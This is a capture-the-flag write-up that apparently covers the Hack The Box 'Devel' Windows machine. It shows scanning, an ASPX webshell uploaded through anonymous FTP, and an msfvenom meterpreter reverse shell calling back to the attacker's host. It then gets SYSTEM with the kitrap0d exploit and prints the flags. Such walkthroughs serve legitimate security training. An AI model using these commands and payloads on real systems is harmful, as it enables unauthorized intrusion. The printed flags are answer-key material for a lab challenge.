Devel

22 September 2019

Starting information

Machine IP10.10.10.5
SystemWindows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

10.10.10.5 devel

Then I look for open ports and start an openvas scan:

nmap -p- devel -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:03 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 105.86 seconds

Now I can start nmap scripts on the open ports to gather more information:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:17 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.033s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

Information gathered

My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:

Operating System

Windows

Open ports

PortService
21ftp
80Microsoft IIS httpd 7.5

Vulnerabilities

CVEServiceDescriptionSeverity
CVE-2015-1635IISMS15-034 HTTP.sys Remote Code Execution Vulnerability (remote check)High
noneFTPAnonymous FTP Login ReportingMedium
noneIISMicrosoft IIS Default Welcome Page Information Disclosure VulnerabilityMedium
CVE-2010-3332IISMicrosoft ASP.NET Information Disclosure Vulnerability (2418042)Medium
noneFTPFTP Unencrypted Cleartext LoginMedium

Exploits

Now that I have a list of CVE I can see if they are included in metasploit and try them out. I start Metasploit with msfconsole and search for the first CVE.

msf5 > search 2015-1635

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure

Even though there seems to be some kind of exploits, none can grant me enough information to retrieve the flags. Let's recap what I have at my disposal:

  • an IIS server
  • an anonymous ftp access

The anonymous ftp access lets me get and push files to the server public files. I should be able to push a webshell and access it from the server.

First I retrieve a standard aspx webshell from the ones included in my Parrot distribution.

cp /usr/share/webshells/aspx/cmdasp.aspx  .

Then I push it to the server with my anonymous ftp access

ftp devel
Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (12.3892 MB/s)
ftp>

Now I can access http://10.10.10.5/cmdasp.aspx and start sending command through the form. If we try whomami we get iis apppool\web.

Getting a better shell

Using the shell from the form is quite impractical. To be more comfortable I will use a reverse shell generated from msfvenom.

First I create the shell it will listen on port 4444:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe

Next I upload the shell to the server with my ftp connection, I make sure to set the exchange type to binary:

Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put shell.exe
local: shell.exe remote: shell.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
73802 bytes sent in 0.07 secs (1.0353 MB/s)

Now I can start msfconsole and a listener. To do so I use exploit/multi/handler:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444

My listener is started, I can execute the payload by passing the command C:\inetpub\wwwroot\shell.exe to the form. Immediately, I can see that my listener is being activated:

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 17:31:48 +0200

meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  138752   fil   2009-07-14 02:11:35 +0200  AppHostNavigators.dll
100777/rwxrwxrwx  125440   fil   2009-07-14 02:10:51 +0200  InetMgr.exe

Getting root

With my newly acquired meterpreter shell let's get some more information about the system:

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter >

I can try to get a root shell with getsystem. In my case it didn't work.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

I will have to try other ways to get my privilege escalation. A good list can be found here.

After trying multiple things, and keeping in mind that I am targeting Windows 7, I decided to try windows/local/ms10_015_kitrap0d.

To configure the exploit I first set my current shell in the background:

meterpreter > background
[*] Backgrounding session 1...

Then I select my exploit with use windows/local/ms10_015_kitrap0d and configure it:

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4444
LPORT => 4444

Finally I can run the exploit

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

Unfortunately it does not work. But sometimes an exploit needs to be run multiple times to work. After more tries I finally get my privilege escalation:

[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Launching notepad to host the exploit...
[+] Process 2384 launched.
[*] Reflectively injecting the exploit DLL into 2384...
[*] Injecting exploit into 2384 ...
[*] Exploit injected. Injecting payload into 2384...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 18:33:36 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now getting the flags is a piece of cake:

meterpreter > cat C:/Users/Administrator/Desktop/root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

meterpreter > cat C:/Users/babis/Desktop/user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8